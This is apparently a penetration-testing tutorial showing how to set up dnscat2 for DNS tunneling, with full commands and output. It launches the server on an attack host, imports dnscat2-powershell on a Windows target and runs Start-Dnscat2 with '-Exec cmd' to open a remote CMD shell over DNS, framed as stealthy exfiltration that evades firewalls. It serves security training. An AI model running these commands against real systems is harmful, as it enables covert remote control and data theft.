DNS Tunneling w/ Dnscat2

Dnscat2 is a tunneling tool that uses DNS protocol to send data between two hosts. It uses an encrypted C2 channel and sends data inside TXT records within the DNS protocol. Usually, every active directory domain environment in a corporate network will have its own DNS server, which will resolve hostnames to IP addresses and route the traffic to external DNS servers participating in the overarching DNS system. However, with dnscat2, the address resolution is requested from an external server. When a local DNS server tries to resolve an address, data is exfiltrated and sent over the network instead of a legitimate DNS request. Dnscat2 can be an extremely stealthy approach to exfiltrate data while evading firewall detections which strip the HTTPS connections and sniff the traffic. For our testing example, we can use dnscat2 server on our attack host, and execute the dnscat2 client on another Windows host.

neutron@kali[/kali]$ git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/
gem install bundler
bundle install

We can then start the dnscat2 server by executing the dnscat2 file.

neutron@kali[/kali]$ sudo ruby dnscat2.rb --dns host=,port=53,domain=legalcorp.local --no-cache

New window created: 0
dnscat2> New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on
[domains = legalcorp.local]...

Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):

  ./dnscat --secret=0ec04a91cd1e963f8c03ca499d589d21 legalcorp.local

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53 --secret=0ec04a91cd1e963f8c03ca499d589d21

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

After running the server, it will provide us the secret key, which we will have to provide to our dnscat2 client on the Windows host so that it can authenticate and encrypt the data that is sent to our external dnscat2 server. We can use the client with the dnscat2 project or use dnscat2-powershell, a dnscat2 compatible PowerShell-based client that we can run from Windows targets to establish a tunnel with our dnscat2 server.

neutron@kali[/kali]$ git clone https://github.com/lukebaggett/dnscat2-powershell.git

Once the dnscat2.ps1 file is on the target we can import it and run associated cmd-lets.

PS C:\xyz> Import-Module .\dnscat2.ps1

After dnscat2.ps1 is imported, we can use it to establish a tunnel with the server running on our attack host. We can send back a CMD shell session to our server.

PS C:\xyz> Start-Dnscat2 -DNSserver -Domain legalcorp.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd 

We must use the pre-shared secret (-PreSharedSecret) generated on the server to ensure our session is established and encrypted.

Confirming Session Establishment

New window created: 1
(the security depends on the strength of your pre-shared secret!)


Listing dnscat2 Options

dnscat2> ?

Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows

We can use dnscat2 to interact with sessions and move further in a target environment on engagements.

Interacting with the Established Session

dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

Microsoft Windows [Version 10.0.18363.1801]
(c) 2019 Microsoft Corporation. All rights reserved.